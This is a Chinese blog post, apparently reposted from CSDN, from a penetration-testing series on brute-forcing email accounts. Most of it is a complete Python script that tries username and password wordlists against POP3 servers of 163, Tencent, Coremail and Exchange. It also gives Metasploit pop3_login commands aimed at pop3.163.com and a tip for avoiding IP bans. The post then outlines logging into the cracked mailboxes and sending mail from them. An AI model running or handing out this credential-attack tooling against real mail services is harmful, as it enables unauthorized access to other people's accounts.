42.网络安全渗透测试—[穷举篇5]—[通用邮箱穷举]

本文阅读 2 分钟
首页 代码,C/C#/C++ 正文

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、通用邮箱穷举

1、暴力破解方法1:baopo.py脚本

(1)脚本修改:baopo.py

注意脚本中的这个是邮箱服务器:server = "pop.qiye.163.com" 
爆破163邮箱的时候修改为:server = "pop.163.com"

脚本如下所示:

#!usr/bin/python 
#!coding:utf-8 

import threading,time,random,sys,poplib 
from copy import copy 

if len(sys.argv) !=4: 
    print "\t Note: 邮箱类型为:'163','tencent','coremail','236','exchange' \n" 
    print "\t Note: coremail|exchange 用户字典不需要域名后缀,例如zhangsan\n" 
    print "\t Note: 163|tencent|236 用户字典需要域名后缀,例如zhangsan@domain.com\n" 
    print "\t Usage: 163|tencent使用方法:./mail.py type <userlist> <wordlist>\n" 
    print "\t Usage: 236|exchange|coremail使用方法:./mail.py type <userlist> <wordlist> mail.domain.com\n"   

    sys.exit(1) 

mailType=['163','tencent','coremail','236','exchange'] 

if sys.argv[1] in ['236','exchange','coremail']: 
    try: 
        server = sys.argv[5] 
    except: 
        print '[-] Error: 236|exchange|coremail需要指定domain.com,请参考使用说明!\n' 
        sys.exit(1) 
elif sys.argv[1] == '163': 
    server = "pop.qiye.163.com" 
elif sys.argv[1] == 'tencent': 
    server = "pop.exmail.qq.com" 
else : 
    print "[-] Error: 邮箱类型错误\n" 
    sys.exit(1) 
     
success = [] 

try: 
    users_list = open(sys.argv[2], "r") 
    users = users_list.readlines() 
    words_list = open(sys.argv[3], "r") 
    words = words_list.readlines() 
except(IOError): 
    print "[-] Error: 请检查用户名或密码路径及文件\n" 
    sys.exit(1) 
finally: 
    users_list.close() 
    words_list.close() 
     
try: 
    if sys.argv[1] in ['163','236']: 
        pop = poplib.POP3(server,110)         
    else: 
        pop = poplib.POP3_SSL(server,995) 
    welcome = pop.getwelcome() 
    print welcome 
    pop.quit() 
except (poplib.error_proto): 
    welcome = "[-] Error: No Response,Something wrong!!!\n" 
    sys.exit(1) 

print "[+] Server:",server 
print "[+] Users Loaded:",len(users) 
print "[+] Words Loaded:",len(words) 
print "[+] Server response:",welcome,"\n" 

def mailbruteforce(listuser,listpwd,type): 
    if len(listuser) < 1 or len(listpwd) < 1 : 
        print "[-] Error: An error occurred: No user or pass list\n" 
        return 1 
     
    for user in listuser: 
        for passwd in listpwd : 
            user = user.replace("\n","") 
            passwd = passwd.replace("\n","") 
             
            try: 
                print "-"*12 
                print "[+] User:",user,"Password:",passwd 
                 
# time.sleep(0.1) 
                if type in ['163','236']: 
                    popserver = poplib.POP3(server,110)         
                else: 
                    popserver = poplib.POP3_SSL(server,995) 
                popserver.user(user) 
                auth = popserver.pass_(passwd) 
                print auth 
                 
                if auth.split(' ')[0] == "+OK" or auth =="+OK": 
                    ret = (user,passwd,popserver.stat()[0],popserver.stat()[1]) 
                    success.append(ret) 
                    #print len(success) 
                    popserver.quit() 
                    break 
                else : 
                    popserver.quit() 
                    continue 
             
            except: 
                #print "An error occurred:", msg 
                pass 

if __name__ == '__main__': 
    mailbruteforce(users,words,sys.argv[1]) 
     

    print "\t[+] have weakpass :\t",len(success) 
    if len(success) >=1: 
        for ret in success: 
            print "\n\n[+] Login successful:",ret[0], ret[1] 
            print "\t[+] Mail:",ret[2],"emails" 
            print "\t[+] Size:",ret[3],"bytes\n" 
    print "\n[-] Done"

(2)开始爆破:python baopo_163.py 163 email_test.txt pass.txt

//测试目标的email存放于eamil_test.txt

//密码pass.txt不能超过10个,不然会被封IP img

2、暴力破解方法2:Metasploit的扫描模块

(1)打开cmd:开启Metasploit

msfconsole
    search pop3
    use auxiliary/scanner/pop3/pop3_login
    set rhosts pop3.163.com
    set pass_file  C:/Users/Administrator/Desktop/pass.txt
    set user_file  C:/Users/Administrator/Desktop/email_test.txt
    set stop_on_success true
    run

img (2)设置选项并开始扫描:目标邮箱的服务器、用户名/密码的字典等等

img 查看选项: img

3、暴力破解方法3:MailCracker

img

4、爆破后登录:利用foxmail登录

img img img img

5、登录成功后测试发送邮件

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/119427473
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复